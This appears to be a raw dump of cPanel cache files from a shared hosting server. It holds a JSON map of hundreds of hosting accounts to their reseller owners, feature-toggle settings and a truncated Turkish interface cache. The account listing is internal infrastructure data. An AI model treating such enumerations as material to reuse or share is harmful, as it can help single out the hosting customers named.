yazilimsistemler","bucaksuarit":"sametwhq","superfide":"mustafacan","epinalco":"epinalco","duvenci":"sedefahs","nalcacidekorasyo":"gramaxcom","siteornekleritr":"yazilimsistemler","tdteknolojicom":"hxetekda","servisma":"cicek","asiklim":"sametwhq","medyasosyalim":"vegoseco","feristah":"root","golgeyaz":"golgeyazarlar","admin":"yazilimsistemler","metin":"vegoseco","trendjym":"root","azizbeyh":"azizbeyh","saglikkayseri":"lupusyaz","aydinlioglumimar":"bergamab","empirehealthther":"empirehe","yuvamdragos2":"yazilimsistemler","exaguvenlik":"serdivan","lukeysook":"s2rrhdeq","tiachocolate":"mustafacan","aclmekan":"aclmekan","ethemerd":"root","yuvamdragosan":"yazilimsistemler","ugurluhukukburo":"yazilimsistemler","monicard":"root","efuteknoloji":"vulnerda","smskodun":"root","onurcanpozan":"wemedyan","bilisim":"vegoseco","yantesan":"root","whatclinichairtr":"yazilimsistemler","moodreklam":"socialgu","emefener":"root","eritirco":"root","pardanismanlik":"eroltasgin","benimsoft":"sametwhq","memurali":"root","milestonescoffee":"milestonescoffee","hitekmuhendislik":"wemedyan","mnkinsaatcomtr":"yazilimsistemler","empirehealthnase":"empirehe","setdemuz":"setdemuz","ykssiqju":"root","tumdizayncom":"tumdizayncom","bergamaglobal":"bergamab","yigittekninegol":"sametwhq","baryolinsaat":"teskonpr","arsisgde":"root","bergama":"bergamab","montanotarim":"gramaxcom","makropower":"savasder","savasder":"savasder","suzersof":"root","eneskombi34":"sametwhq","kualde":"fatihsup","netkiralik":"keyfinyerinegels","bufamaco":"bufamaco","nesimgrup":"morgraf1","deneme27serkan":"root","pozitifa":"root","erdemdav":"root","anadooria":"sedefahs","selin":"cicek","konyaseouzmani":"gramaxcom","ahabu":"root","otluav":"sedefahs","sinan":"vegoseco","maltepeananet":"yazilimsistemler","sizidebekliyor":"deepexay","emreerdo":"root","terziyolyardim":"fskhost1","xnbfbx":"xnbfbx","etechglobaltr":"yazilimsistemler","tdteknoloji":"hxetekda","bandirmatamirmer":"sametwhq","cevtexcom":"socialgu","zirkonsuitataseh":"yazilimsistemler","hataywebyazilim":"socialgu","efuteknolojicom":"vulnerda","irkentek":"sametwhq","sametwhq":"sametwhq","thebayku":"ekstrafi","vussovco":"root","bozkurtahsap":"visuald","engelsizdestek":"eroltasgin","veracilek":"mustafacan","tsicom":"fatihsup","kfkmetal":"yazilimsistemler","cekmez":"denizin","beylikdu":"root","arrabcc":"s2rrhdeq","parsigorta":"eroltasgin","gizemlia":"root","bolgeservaziz":"sametwhq","empirehealthverl":"empirehe","visuald":"visuald","drseherari":"morgraf1","vedatcom":"cicek","germanmcacademy":"morgraf1","proug":"mustafaca","suvakeray":"suvakhostt","edijitalturkiye":"root","rainkids":"fatihsup","ayazsgtm":"sametwhq","sataatxz":"root","zekathes":"root","ledbuauu":"root","mberatsa":"root","aboneyemek":"teskonpr","suvakhostt":"suvakhostt","uregenmakine":"teskonpr","doktoraziz":"azizbeyh","cihangir":"golgeyazarlar","mutlu":"cicek","bientr":"cicek","bergamanakliyatt":"bergamab","maxilux":"kozmotgx","arwaramadan":"s2rrhdeq","ulusalgu":"root","sivassporlular":"yazilimsistemler","hamadiso":"root","haberyazilimi":"xnbfbx","yalcin":"eroltasgin","baytokf":"root","samaspor":"root","ashapartners":"s2rrhdeq","gokcebasari":"wemedyan","freelqhd":"root","nameinsaat":"yazilimsistemler","ekinmarkt":"mustafacan","twinswooden":"ekstrafi","emrullah":"xnbfbx","yildirimacademy":"s2rrhdeq","sigorta":"cicek","disedemo":"disedemo","sdkambalaj":"kozmotgx","menaspeakers":"s2rrhdeq","scientificcalcul":"root","tepkibu":"root","genctekstil":"fatihsup","famedya":"fatihsup","pmproje":"teskonpr","noakaucuk":"noakaucuk","tortobac":"root","cevherbenissimo":"vulnerda","sedefahs":"sedefahs","onkacelikcomtr":"yazilimsistemler","ussalsahbaz":"wemedyan","uzayrfid":"microtag","ebrunurates":"sedefahs","rdmdijit":"root","gozde":"cicek","teknikpl":"root","roscent":"morgraf1","globallydent":"deepexay","integra1":"root","e2yatirim":"tamerlojistik","khibedan":"bergamab","isimci":"cicek","empirehealththde":"empirehe","boyavesat":"mustafacan","ontechbi":"root","endus":"cicek","buyuksqy":"root","piramitflekso":"kozmotgx","promedya":"root","asyaekercom":"tamerlojistik","arkmimarlikbursa":"suvakhostt","turkiyebungalov":"byistanb","yalemav":"sedefahs","asaadktf":"root","irfanbar":"root","basersig":"basersig","pasahanav":"lupusyaz","enginpyx":"root","kayramsp":"root","hmetekda":"hxetekda","onlineceviz":"savasder","salihoto":"vasitbmy","silatic1":"root","serafin":"vegoseco","ilkemqfd":"root","bugraotocekici":"fskhost1","selinusmedikalco":"empirehe","theesilv":"keyfinyerinegels","kizk":"wemedyan","yukakozmosagency":"kozmotgx","izmirlazer":"teskonpr","istanbulhairtran":"yazilimsistemler","multimexcom":"lupusyaz","apptosd":"visuald","dragosanaokullar":"yazilimsistemler","benzinca":"root","kombi":"cicek","modestconcept":"ekstrafi","nordenaj":"nordenaj","payakdemircelik":"mustafaca","predictivehrsolu":"morgraf1","ikikitacom":"deepexay","ozlempastanesi":"lupusyaz","inspecttest":"savasder","empirehealthivf":"empirehe","konyacayci":"tamerlojistik","beyazpro":"root","bankofwo":"root","drmobayed":"s2rrhdeq","novaybsx":"simaleya","cukurovamakineki":"lupusyaz","cozumkoc":"root","kesancicek":"root","erzincancekici":"fskhost1","gizlihat":"yazilimplus","arenaara":"root","uygarfmc":"uygarfmc","sedoor":"sedefahs","serpilki":"root","ugurcanpansiyon":"bilecnrb","ikilimitedcom":"mustafacan","cizgialtireklam":"morgraf1","cosarmer":"root","dasdwpsq":"root","lupusyaz":"lupusyaz","pi94":"hxetekda","freejadmin9":"s2rrhdeq","zayakors":"root","bakirkoygunlukev":"keyfinyerinegels","nivova":"vegoseco","emrecany":"root","ankarabe":"root","dogrukmz":"root","turgutluweb":"milestonescoffee","luxerycl":"root","arduijjw":"root","sekademircelik":"mustafaca","foiceyco":"root","atelierdobemine":"kozmotgx","microtag":"microtag","kaanlpgu":"root","egeharita":"socialgu","docterembant":"savasder","arimayacom":"xnbfbx","bakircaynakliyat":"bergamab","empirehealthorth":"empirehe","tolgaka1":"root","parsfor1":"setdemuz","heusmt2":"sumselco","kecioren":"root","vegoseco":"vegoseco","ruyahome":"root","compactaero":"ekstrafi","yilmazinsaat":"teskonpr","ithalatcc":"wemedyan","s1enerji":"serdivan","bvsmuhendislik":"yazilimsistemler","zirkonsuit":"yazilimsistemler","berber":"vegoseco","alagomtt":"yazilimsistemler","indirimb":"root","niskapus":"root","sehzacdh":"root","ismailug":"root","atillebm":"root","empirehealthobes":"empirehe","dincerlerservis":"sametwhq","eticaretdigital":"bergamab","weisssqa":"root","gurbilekpetrolco":"aclmekan","isvgco":"bergamab","sigortaet":"yazilimsistemler","yuvamdra":"yazilimsistemler","drotomasyon":"mustafacan","demokozmosagency":"kozmotgx","emcsound":"root","demmetzy":"root","empirehealthasth":"empirehe","nateksancom":"hxetekda","arayor":"root","muhamnum":"root","ayisivwf":"suvakhostt","denizin":"denizin","mayaguvenlik":"wemedyan","karasugranite":"bergamab","styksl":"fatihsup","riskybaby":"kozmotgx","tarihtem":"tarihtem","brgotokurtar":"bergamab","dnccool":"hxetekda","busrakabaagac":"morgraf1","ludumart":"root","hausarbeitenschr":"morgraf1","jaxxcoff":"root","cocukcnq":"root","nursense":"root","pozitifsesisik":"sametwhq","silivriv":"root","anadoluyakasikot":"yazilimsistemler","taktikmedya":"simaleya","wiseand1":"root","kuzeyteknikaydin":"sametwhq","pharmatopia1":"wemedyan","dogucu":"sedefahs","filesncr":"root","tamerlojistik":"tamerlojistik","kagrukqa":"root","amabiliaestetica":"morgraf1","realmedyaresmi":"socialgu","gulsaxdc":"setdemuz","laviniam":"root","kartalanaokul":"yazilimsistemler","wstudiodsgn":"yazilimsistemler","hayaletyazar":"golgeyazarlar","avukathu":"socialgu","parsaglik":"eroltasgin","tuyluogl":"tuyluogl","unizone":"root","empirehealthfett":"empirehe","yuvamdragosanaok":"yazilimsistemler","banyo":"cicek","fatmayildirim":"hxetekda","bircasqg":"root","anisancom":"lupusyaz","tozboya":"vegoseco","upcagqqb":"root","benserkan":"root","gunesfaltarotcom":"yazilimsistemler","oledtrco":"root","ustaon":"cicek","empirehealthonko":"empirehe","intisadorg":"eroltasgin","dehaplas":"root","hayalbahcesi":"yazilimsistemler","wemedyan":"wemedyan","petkuaforumcomtr":"yazilimsistemler","kycgayrimenkul":"deepexay","gramaxcom":"gramaxcom","yaman":"cicek","kaucuk":"cicek","captainmun":"simaleya","empirehealthskol":"empirehe","drykingm":"root","itechvdb":"root","mutlukas":"root","yusufvarli":"wemedyan","tecnodesigncom":"vegoseco","sozyapiinsaat":"teskonpr","usluayvaz":"sametwhq","ankarada":"root","podiacli":"root","neyakarc":"root","diyetisyenecem":"kozmotgx","doctoremplusnet":"savasder","dortyold":"socialgu","anadoluyakasikon":"yazilimsistemler","temizlikmakinase":"vulnerda","oscarteknikservi":"sametwhq","teknojumbo":"teknodiyari","technof1":"root","seorejaj":"root","smsaktif":"yazilimplus","mustafacan":"mustafacan","vidaliftcom":"mustafacan","hesapvad":"root","comertteknik":"sametwhq","hcinsaat":"teskonpr","yagcilargida":"gramaxcom","akmanlar":"teskonpr","weisscre":"root","mobilyaustasiyim":"ekstrafi","mentalog":"morgraf1","esteborncom":"yazilimsistemler","boatsail":"bestprof","trqs":"byistanb","truthpyu":"root","netplanfilo":"teskonpr","odeawebn":"root","rihtimteknoloji1":"yazilimsistemler","rehamobi":"rehamobi","ozergrup":"root","kartalanaokk":"yazilimsistemler","takaamor":"takaamor","ozanteknik":"sametwhq","migrationjam":"s2rrhdeq","cukurova":"lupusyaz","juventu2":"juventu2","mustafaca":"mustafaca","koskunlu":"root","yilmazaydin":"serdivan","xooncom":"root","onerihvh":"root","imamnika":"root","smartakip":"microtag","agacdikelim":"deepexay","medsagay":"root","nizamiyya":"s2rrhdeq","acikhatz":"yazilimplus","yazilimplus":"yazilimplus","thealmon":"root","mentalmuslim":"s2rrhdeq","degirmen":"root","tocmoder":"morgraf1","ballibabaqrmenuc":"gramaxcom","fatihsup":"fatihsup","yuvamdagosanaoku":"yazilimsistemler","renginib":"root","fatma":"vegoseco","ciddihmt":"root","fskhost1":"fskhost1","leventhatay":"morgraf1","serdivan":"serdivan","endasotomasyonn":"sametwhq","suramesrubat":"vulnerda","nivolnx":"vegoseco","cozenerj":"root","elitepmh":"suvakhostt","jetturkc":"jetturkc","nazeninoyunevi":"vegoseco","s2rrhdeq":"s2rrhdeq","bilecnrb":"bilecnrb","ayasinko":"root","oxopagec":"root","empirehe":"empirehe","rihtimteknoloj":"yazilimsistemler","sagirogluklima":"sametwhq","yazarkasa":"cicek","izmirse2":"root","cicialyanscom":"lupusyaz","vanoznet":"yazilimsistemler","bybikeparkcom":"aclmekan","herlisan":"root","elmashilesi":"teknodiyari","seyrialemkafe":"visuald","maltepeannok":"yazilimsistemler","hakanaluminyum":"serdivan","doctoremdunyasi":"savasder","yuksellidersigor":"basersig","amasiocr":"root","wwwcokcilekcom":"mustafacan","nasayapi":"teskonpr","bostancigunlukki":"yazilimsistemler","yoldakaldim":"fskhost1","siya":"teskonpr","ranteyco":"root","kartalanaoku":"yazilimsistemler","indexfwe":"suvakhostt","takipbic":"root","hilecifare":"teknodiyari","nurdeva":"mustafacan","biroldur":"root","usahowba":"root","ceramicproizmir":"teskonpr","cilekfabcomtr":"mustafacan","oslomimarlik":"yazilimplus","enginates":"bergamab","madgiyim":"root","ankarakombiklima":"sametwhq","cicek":"cicek","sdmtelek":"cicek","hschukuk":"teskonpr","laluccecom":"gramaxcom","yowgokce":"sametwhq","mayajeak":"xnbfbx","akserteknik":"sametwhq","mek":"cicek","bunnybons":"wemedyan","adgyenic":"hxetekda","babutsan":"morgraf1","canturkm":"root","yasarakc":"root","adosgroupcom":"suvakhostt","elieme":"cicek","ilkonlar":"root","yildizserviscom":"sametwhq","cokcihkn":"mustafacan","karsaglikcom":"eroltasgin","xupeuras":"morgraf1","emkfilmcom":"bufamaco","empirehealthcanc":"empirehe","hdbilgisayarcom":"yazilimsistemler","adistamakademi":"simaleya","buket":"cicek","idouhxqe":"root","empirehealthrhin":"empirehe","empirehealthgyde":"empirehe","otosam":"cicek","afgeswae":"root","sahintourism":"rasittasarim","kemalkarahan":"socialgu","anafina":"morgraf1","kromluks":"root","ezgikoc":"teskonpr","parlegalcom":"eroltasgin","empirehealthaest":"empirehe","tnrmetal":"teskonpr","salonturgaycom":"yazilimsistemler","ateisszh":"root","balikesirramazan":"sametwhq","planliaj":"root","linaegitimcom":"gramaxcom","marmaraplastik":"fatihsup","latexyal":"root","abakusculinaria":"morgraf1","giresunf":"root","ayvazcraft":"simaleya","empirehealthgehi":"empirehe","almasarstudies":"s2rrhdeq","halilbeyliciftli":"milestonescoffee","elasinabalik":"morgraf1","bkaparto":"root","hzliteknikservis":"bufamaco","delifemedikal":"gramaxcom","veesolar":"root","nomoshukuk":"sedefahs","elkopcom":"root","fullcovercom":"eroltasgin","avmehmet":"root","semazeninsaatcom":"aclmekan","nzappvcv":"root","proflhjp":"root","bilisimmerahmet":"rasittasarim","sibelkek":"root","bunyamincicekmal":"gramaxcom","a1fireproof":"lupusyaz","ckmprvwz":"suvakhostt","kravatfa":"root","dcenerji":"root","ebteksti":"root","eroltasgin":"eroltasgin","orhanbaba":"rasittasarim","beyazesyaservisi":"sametwhq","sallagitsin":"keyfinyerinegels","agaofis":"mustafacan","goodforyoutuncel":"savasder","denoyun":"denizin","gendaxsoftwareco":"suvakhostt","tuyobico":"tuyobico","dorukyapi":"teskonpr","ajansonline":"juventu2","meramcenter":"aclmekan","sevgizym":"root","paksudeinsaat":"aclmekan","prpdijital":"wemedyan","thedaiy1":"root","lavienzh":"root","bakircayvinc":"bergamab","yigido":"yazilimsistemler","sefmezebalikfeth":"byistanb","gebzeaku":"vasitbmy","konyajbw":"root","kzmv":"byistanb","burakelmaagac":"golgeyazarlar","artifolyocom":"lupusyaz","babyplus":"root","zinet":"root","canbuaxt":"canbuaxt","tatillen":"root","creadiji":"root","ismailmaya":"xnbfbx","denemeco":"suvakhostt","misallatacomtr":"yazilimsistemler","pegasusi":"root","onkacelik":"yazilimsistemler","vesselfl":"root","schraube":"cicek","ismails1":"root","supercilek":"mustafacan","misallatacom":"yazilimsistemler","karakayaclinic":"kozmotgx","tcmguvenliksiste":"yazilimsistemler","abakusgourmetas":"morgraf1","falocom":"gramaxcom","hairtransplant":"yazilimsistemler","akayevale":"sametwhq","ststeknikservis":"sametwhq","pusulase":"simaleya","psikologaydilmet":"wemedyan","dgec":"deepexay","empirehealth":"empirehe","armanancom":"vulnerda","afacanlarokulda":"vulnerda","naiveus":"simaleya","barettashop":"cicek","pratikak":"root","smmiceco":"root","hilalteknikalany":"sametwhq","umityedikardes":"suvakhostt","mnkinsaat":"yazilimsistemler","rcbodrum":"root","apexegdw":"suvakhostt","healthaugede":"empirehe","moongiyim":"yazilimplus","ayyildiz":"bergamab","ugur":"vegoseco","metropolettr":"yazilimsistemler","hayatradyoloji":"yazilimsistemler","qrmenczx":"root","sincansi":"root","beykozmezar":"fatihsup","akuyolyardim":"vasitbmy","rainakademigayri":"socialgu","albitra":"root","deroni":"byistanb","sosyalevreni":"canbuaxt","healthorgande":"empirehe","lautner":"eroltasgin","satinalt":"root","arel":"bergamab","bostanckonaklama":"yazilimsistemler","antalyal":"root","reemhelinspace":"s2rrhdeq","modagiysi":"socialgu","arslapqf":"simaleya","ctaburocomtr":"yazilimsistemler","hxetekda":"hxetekda","basaran":"bilecnrb","ilkhesap":"yazilimplus","socialgu":"socialgu","hilmi":"cicek","wemedya":"wemedyan","karteuvf":"root","smsmono":"yazilimplus","empirehealthleng":"empirehe","cemredizayn":"tumdizayncom","retrocoffee":"yazilimsistemler","alanyaservisim":"sametwhq","creafunn":"wemedyan","ibancuzd":"root","recepsevim":"serdivan","vatanpar":"root","muratagro":"gramaxcom","vanozcomtr":"yazilimsistemler","sezerhuseyinozde":"visuald","erakkozmosagency":"kozmotgx","empirehealthivde":"empirehe","kaugen":"cicek","karadeniz":"simaleya","tazekesim":"deepexay","citycenter":"suvakhostt","empirehealthgyne":"empirehe","qmt":"cicek","parsportingclub":"eroltasgin","parserisimarket":"sametwhq","mossatis":"root","miracleh":"yazilimsistemler","cakir":"simaleya","nefes":"teskonpr","dupnisaciftligi":"dijitald","lentomed":"root","empirehealtortde":"empirehe","simaleya":"simaleya","ekstrafi":"ekstrafi","basewebc":"root","pursaklarimkb":"vegoseco","morgraf1":"morgraf1","bakanysa":"root","bilgidehasi":"visuald","falcihi1":"root","rosewhite":"wemedyan","teskonpr":"teskonpr","tkhard":"takaamor","tatilmad":"root","mtnmedikallcom":"yazilimsistemler","kapivize":"root","csngrowth":"socialgu","keter":"cicek","simmetalize":"morgraf1","ihomeinsaat":"s2rrhdeq","marmara":"cicek","melplas":"denizin","artisealscom":"lupusyaz","hayalety":"golgeyazarlar","dsvline":"kozmotgx","fesim":"fatihsup","ndtradetr":"simaleya","neyinpmv":"root","ahmetkara":"fskhost1","golgeyazarlar":"golgeyazarlar","giris":"cicek","robotikk":"root","asyetvda":"root","lifelonghealth":"kozmotgx","avmirays":"root","coktan":"cicek","degerpartisiorg":"eroltasgin","ankarase":"root","artcolumncom":"root","beyazzam":"root","asilcaymuhendisl":"aclmekan","senverco":"root","turkcesesindir":"fatihsup","bildirhaber":"root","yalovahills":"s2rrhdeq","chalkedon":"fatihsup","bergamab":"bergamab","yazarkoc":"golgeyazarlar","fatihler":"root","kutupasa":"root","sametbaysal":"golgeyazarlar","gelsin":"denizin","ayselozk":"root","vedat":"cicek","ergavis":"eroltasgin","uskudari":"root","farpinsc":"root","smmturkprovider":"socialgu","nalanurguplu":"kozmotgx","bilgeavu":"root","ergenebilisim":"vulnerda","emretasgin":"eroltasgin","eigist":"root","dscom":"cicek","selahattinpar":"eroltasgin","ozturjhr":"root","ecaumraniyeservi":"sametwhq","bamucaah":"root","bestprof":"bestprof","vetrizvk":"root","mdteknikservis":"sametwhq","yazilimsistemler":"yazilimsistemler","kesikmotor":"socialgu","trotomasyon":"mustafacan","byistanb":"byistanb","istanbuldoctors":"eroltasgin","racknite":"root","sadripha":"sadripha","psikovtg":"root","keyfinyerinegels":"keyfinyerinegels","concevoirproduct":"s2rrhdeq","empirehealthorga":"empirehe","maltepeanaokulum":"yazilimsistemler","evlilnes":"root","cilekfab":"mustafacan","qoicakir":"hxetekda","yusufakc":"root","cephanelik":"morgraf1","emseadjb":"root","ozsteel":"yazilimsistemler","sumselco":"sumselco","ercanhali":"teskonpr","gamergxc":"root","gelsinltd":"denizin","dijitald":"dijitald","aksuownm":"root","lakkegxw":"root","nesciences":"root","cpuibrah":"morgraf1","basincliservisco":"vulnerda","sairlutq":"root","pnmkilic":"morgraf1","baskenthasar":"eroltasgin"} caches/config/_var_cpanel_features_disabled___2859283035 0000600 00000000574 15025306757 0016642 0 ustar 00 {"version_control":"0","lveresusage":"0","ssh":"0","lvepythonsel":"0","ipdeny":"0","modules-php-pear":"0","modules-ruby":"0","php-config":"0","lvenodejssel":"0","lists":"0","serverstatus":"0","nettools":"0","imunify360":"0","modsecurity":"0","lverubysel":"0","handlers":"0","api_shell":"0","boxtrapper":"0","enduserlve":"0","lvephpsel":"0","modules-perl":"0","mime":"0","ror":"0"} caches/config/_var_cpanel_features_default___2859283035 0000600 00000000061 15025306757 0016506 0 ustar 00 {"modsecurity":"0","sitejet":"0","api_shell":"0"} caches/dynamicui/jupiter_tr_.cache 0000640 00000201472 15025306757 0013303 0 ustar 00 {"cachetime":1750262455,"version":"5.0","dyalist":[{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui.conf"},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_lvephpsel.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_cpanel-koality-plugin.conf","allow_legacy":1},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_wp_softaculous.conf"},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_jetbackupsingle.conf","allow_legacy":1},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_lvenodejssel.conf"},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_jetbackupfilesbackups.conf"},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_jetbackupgdpr.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_jetbackupdnsbackups.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_jetbackupdbbackups.conf","allow_legacy":1},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_mailscanner.conf"},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_jetbackupcronbackups.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_lvepythonsel.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_softaculous.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_jetbackupsnapshots.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_lveresusage.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_ls_web_cache_manager.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_jetbackupemailbackups.conf","allow_legacy":1},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_imunify360.conf"},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_group_jetbackup.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_group_soft_div.conf","allow_legacy":1},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_jetbackupsettings.conf"},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_cpanel-site-monitor.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_jetbackupqueue.conf","allow_legacy":1},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_lvewpos.conf"},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_cpanel-sitejet-plugin.conf"},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_lvexray.conf","allow_legacy":1},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_jetbackupfullbackups.conf"},{"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_soft_div_icons.conf","allow_legacy":1},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/jupiter//dynamicui/dynamicui_lverubysel.conf"},{"file":"/home2/ajansonline/cpanelbranding/jupiter/dynamicui.conf","allow_legacy":1},{"file":"/var/cpanel/integration/dynamicui/ajansonline/dynamicui_group_whmcs.conf","allow_legacy":0}],"conf":{"default_address":{"implements":"Email_DefaultAddress","group":"email","url":"mail/def.html","base64_png_image":"","description":"Set up a default email address.","searchtext":"Varsayılan Adres","key":"default_address","height":"48","feature":"defaultaddress","onclick":"","imgtype":"icon","target":"","plainitemdesc":"Default Address","if":"$HASROLE{'MailReceive'}","type":"image","file":"default_address","itemdesc":"Varsayılan Adres","width":"48","itemorder":"6","subtype":"img","acontent":""},"encryption":{"url":"gpg/index.html","group":"email","onclick":"","feature":"pgp","height":"48","key":"encryption","searchtext":"Şifreleme gpg anahtarları GnuPG Anahtarları","description":"Create, manage, and delete GnuPG keys.","base64_png_image":"","type":"image","if":"$HASROLE{'MailReceive'}","plainitemdesc":"Encryption","target":"","imgtype":"icon","acontent":"","subtype":"img","itemorder":"15","itemdesc":"Şifreleme","width":"48","file":"encryption"},"user_manager":{"width":"48","itemdesc":"Kullanıcı Yöneticisi","itemorder":"4","acontent":"","subtype":"img","file":"user_manager","target":"","plainitemdesc":"User Manager","type":"image","if":"$HASROLE{'FTP'} || $HASROLE{'WebDisk'}","imgtype":"icon","height":"48","feature":"user_manager","onclick":"","base64_png_image":"","description":"Manage the users who can access various systems on your cPanel account.","searchtext":"şifre değişikliği ftp e-posta webdisk webdav hizmet Kullanıcı Yöneticisi","key":"user_manager","group":"preferences","url":"user_manager/index.html"},"zone_editor":{"file":"zone_editor","subtype":"img","acontent":"","width":"48","itemdesc":"Zone Editor","itemorder":"6","imgtype":"icon","if":"$HASROLE{'DNS'}","type":"image","plainitemdesc":"Zone Editor","target":"","searchtext":"zone editor advanced simple caa cname a aaaa txt dkim dmarc spf mx srv record dns dnssec Zone Editor","description":"Create, manage, and delete DNS zone records.","key":"zone_editor","base64_png_image":"","feature":"simplezoneedit || changemx || zoneedit","onclick":"","height":"48","url":"zone_editor/index.html","group":"domains"},"jetbackupgdpr":{"file":"jetbackupgdpr","subtype":"img","acontent":"","width":"48","itemdesc":"GDPR Compliance","itemorder":"10","imgtype":"icon","type":"image","plainitemdesc":"GDPR Compliance","target":"","description":"GDPR Compliance","searchtext":"GDPR Compliance","base64_png_image":"","feature":"jetbackupgdpr","onclick":"","height":"48","url":"jetbackup/index.html#!/gdpr","group":"jetbackup"},"group_domains":{"onclick":"","height":"48","key":"group_domains","searchtext":"group_domains","description":"Etki Alanları","base64_png_image":"","group":"domains","groupdesc":"Etki Alanları","subtype":"img","acontent":"","width":"4","itemdesc":"group_domains","file":"group_domains","type":"image","if":"$HASROLE{'WebServer'} || $HASROLE{'DNS'}","target":"","imgtype":"icon","grouporder":"4"},"multiphp_ini_editor":{"feature":"multiphp_ini_editor","onclick":"","height":"48","searchtext":"MultiPHP INI Düzenleyicisi PHP yapılandırması","description":"Configure your website’s PHP settings.","key":"multiphp_ini_editor","base64_png_image":"","url":"multiphp_ini_editor/index.html","group":"software","acontent":"","subtype":"img","itemdesc":"MultiPHP INI Düzenleyicisi","width":"48","itemorder":"9","file":"multiphp_ini_editor","if":"$is_ea4","type":"image","target":"","plainitemdesc":"MultiPHP INI Editor","imgtype":"icon"},"leech_protection":{"group":"security","url":"htaccess/leechprotect/leechprotect.html","base64_png_image":"","key":"leech_protection","searchtext":"Leech Koruması koru","description":"Detect unusual levels of activity in password-restricted directories.","height":"48","onclick":"","feature":"cpanelpro_leechprotect && webprotect","imgtype":"icon","target":"","plainitemdesc":"Leech Protection","type":"image","if":"$HASROLE{'WebServer'}","file":"leech_protection","itemorder":"5","width":"48","itemdesc":"Leech Koruması","acontent":"","subtype":"img"},"jetbackupdbbackups":{"url":"jetbackup/index.html#!/dbBackups","group":"jetbackup","searchtext":"Database Backups","description":"Database Backups","base64_png_image":"","feature":"jetbackupdbbackups","onclick":"","height":"48","imgtype":"icon","type":"image","target":"","plainitemdesc":"Database Backups","file":"jetbackupdbbackups","subtype":"img","acontent":"","width":"48","itemdesc":"Database Backups","itemorder":"5"},"change_language":{"type":"image","plainitemdesc":"Change Language","target":"","imgtype":"icon","acontent":"","subtype":"img","itemorder":"2","itemdesc":"Dili Değiştir","width":"48","file":"change_language","url":"setlang/index.html","group":"preferences","implements":"Locale_Change","onclick":"","feature":"setlang","height":"48","key":"change_language","searchtext":"dil setlang Dili Değiştir","description":"Change your default language.","base64_png_image":""},"web_host_manager":{"url":"/xferwhm/","group":"advanced","key":"web_host_manager","description":"WebHost Manager®","searchtext":"WebHost Manage webhostmanager whm WebHost Manager®","base64_png_image":"","onclick":"","height":"48","imgtype":"icon","type":"image","if":"$isreseller","target":"","file":"web_host_manager","subtype":"img","acontent":"","itemorder":"1","itemdesc":"WebHost Manager®","width":"48"},"boxtrapper":{"description":"Filter spam from your inbox through challenge-response verification.","searchtext":"BoxTrapper filtresi","key":"boxtrapper","base64_png_image":"","feature":"boxtrapper","onclick":"","height":"48","implements":"Email_BoxTrapper","url":"mail/boxtrapper.html","group":"email","file":"boxtrapper","acontent":"","subtype":"img","itemdesc":"BoxTrapper","width":"48","itemorder":"16","imgtype":"icon","if":"$HASROLE{'MailReceive'} && !$CONFIF{'skipboxtrapper'}","type":"image","target":""},"optimize_website":{"imgtype":"icon","if":"$hasmoddeflate","type":"image","target":"","plainitemdesc":"Optimize Website","file":"optimize_website","acontent":"","subtype":"img","itemorder":"7","itemdesc":"Web Sitesini Optimize Edin","width":"32","url":"optimize/index.html","group":"software","key":"optimize_website","searchtext":"Web Sitesini Optimize Edin","description":"Configure your server to automatically compress specified types of content when visitors access that content.","base64_png_image":"","onclick":"","feature":"optimizews","height":"32"},"clam_av":{"url":"clam-av/index.html","group":"advanced","key":"clam_av","searchtext":"Virüs Tarayıcısı clam clamav antivirüs","description":"Scan your cPanel account for viruses.","base64_png_image":"","onclick":"","feature":"clamavconnector_scan","height":"48","imgtype":"icon","if":"$hasclamav && $HASROLE{'MailReceive'}","type":"image","plainitemdesc":"Virus Scanner","target":"","file":"clam_av","acontent":"","subtype":"img","touch":"clamav","itemorder":"8","width":"48","itemdesc":"Virüs 